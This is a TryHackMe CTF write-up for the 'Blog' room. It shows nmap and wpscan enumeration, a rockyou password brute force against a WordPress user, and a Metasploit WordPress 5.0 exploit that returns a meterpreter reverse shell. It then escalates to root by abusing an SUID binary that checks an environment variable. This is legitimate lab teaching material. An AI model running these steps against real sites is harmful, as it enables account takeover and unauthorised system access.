Tryhackme Blog Writeup
In order to get the blog to work with AWS, you’ll need to add blog.thm to your /etc/hosts file. Then start with nmap scanning.
Command: nmap -vv -sCV blog.thm
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 57:8a:da:90:ba:ed:3a:47:0c:05:a3:f7:a8:0a:8d:78 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3hfvTN6e0P9PLtkjW4dy+6vpFSh1PwKRZrML7ArPzhx1yVxBP7kxeIt3lX/qJWpxyhlsQwoLx8KDYdpOZlX5Br1PskO6H66P+AwPMYwooSq24qC/Gxg4NX9MsH/lzoKnrgLDUaAqGS5ugLw6biXITEVbxrjBNdvrT1uFR9sq+Yuc1JbkF8dxMF51tiQF35g0Nqo+UhjmJJg73S/VI9oQtYzd2GnQC8uQxE8Vf4lZpo6ZkvTDQ7om3t/cvsnNCgwX28/TRcJ53unRPmos13iwIcuvtfKlrP5qIY75YvU4U9nmy3+tjqfB1e5CESMxKjKesH0IJTRhEjAyxjQ1HUINP
| 256 c2:64:ef:ab:b1:9a:1c:87:58:7c:4b:d5:0f:20:46:26 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJtovk1nbfTPnc/1GUqCcdh8XLsFpDxKYJd96BdYGPjEEdZGPKXv5uHnseNe1SzvLZBoYz7KNpPVQ8uShudDnOI=
| 256 5a:f2:62:92:11:8e:ad:8a:9b:23:82:2d:ad:53:bc:16 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICfVpt7khg8YIghnTYjU1VgqdsCRVz7f1Mi4o4Z45df8
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-generator: WordPress 5.0
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Billy Joel's IT Blog – The IT blog
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: BLOG; OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| nbstat: NetBIOS name: BLOG, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BLOG<00> Flags: <unique><active>
| BLOG<03> Flags: <unique><active>
| BLOG<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30652/tcp): CLEAN (Couldn't connect)
| Check 2 (port 21972/tcp): CLEAN (Couldn't connect)
| Check 3 (port 50006/udp): CLEAN (Failed to receive data)
| Check 4 (port 11143/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: blog
| NetBIOS computer name: BLOG\x00
| Domain name: \x00
| FQDN: blog
|_ System time: 2021-02-28T12:23:32+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-28T12:23:32
|_ start_date: N/A
When we look at the http port, we see that wordpress is in used. Then scan usernames with wpscan.
Command: wpscan --url blog.thm -e u
[i] User(s) Identified:[+] kwheel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] bjoel
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blog.thm/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] Karen Wheeler
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)[+] Billy Joel
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Rss Generator (Aggressive Detection)[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
Yes, as we saw that there are two different users. We can brute force attack on these users.
Command: wpscan --url blog.thm -U kwheel -P /home/hakanbey/Desktop/rockyou.txt -t 75
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - kwheel / cu*******
Trying kwheel / disney Time: 00:00:08 < > (2865 / 14344919) 0.00% ETA: ??:??:??Well done. Now we have the password. We can login from the Wordpress login page.
As you seen there is a version number of Wordpress in marked area. Let’s search this version on metasploit.
Command: search Wordpress 5.0
Command: use 0
After selecting the Exploit, let’s make the settings and run.
Command: set PASSWORD cu*******
Command: set USERNAME kwheel
Command: set RHOSTS 10.10.100.204
Command: set LHOST tun0
Command: run
Command: shell
meterpreter > shell
Process 2053 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)If you ask me in this part, you should get a shell on the meterpreter, I always do that and i spawn pty with python in the new shell.
www-data@blog:/var/www/wordpress$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blog:/var/www/wordpress$Now we’ll look at SUID files to upgrade authorization.
Command: find / -perm -4000 -type f 2>/dev/null
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/sbin/checker
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/umount
/bin/ping
/bin/suYeah I think we found it. /usr/sbin/checker we’ll use this.
Command: ltrace /usr/sbin/checker
getenv("admin") = nil
puts("Not an Admin"Not an Admin
) = 13
+++ exited (status 0) +++In the binary file in getenv function, if sees its “admin” between our paths, it call the root bash.
Command: export admin=hakanbey
Command: cd /usr/sbin/
Command: ./checker
www-data@blog:/$ export admin=hakanbey
www-data@blog:/$ cd /usr/sbin/
www-data@blog:/usr/sbin$ ./checker
root@blog:/usr/sbin#Bingo. We are now root user. We can start collecting the flags.
Command: cd /root/ && cat root.txt
9a0b2b61***************53d9f318And finally let’s use the find command to find the user.txt file.
Command: find / -name 'user.txt' 2>/dev/null
root@blog:/root# find / -name 'user.txt' 2>/dev/null
/home/bjoel/user.txt
/media/usb/user.txt
root@blog:/root#Command: cat /media/usb/user.txt
c8421899a*************92b71a8ab7Thank you for reading and solving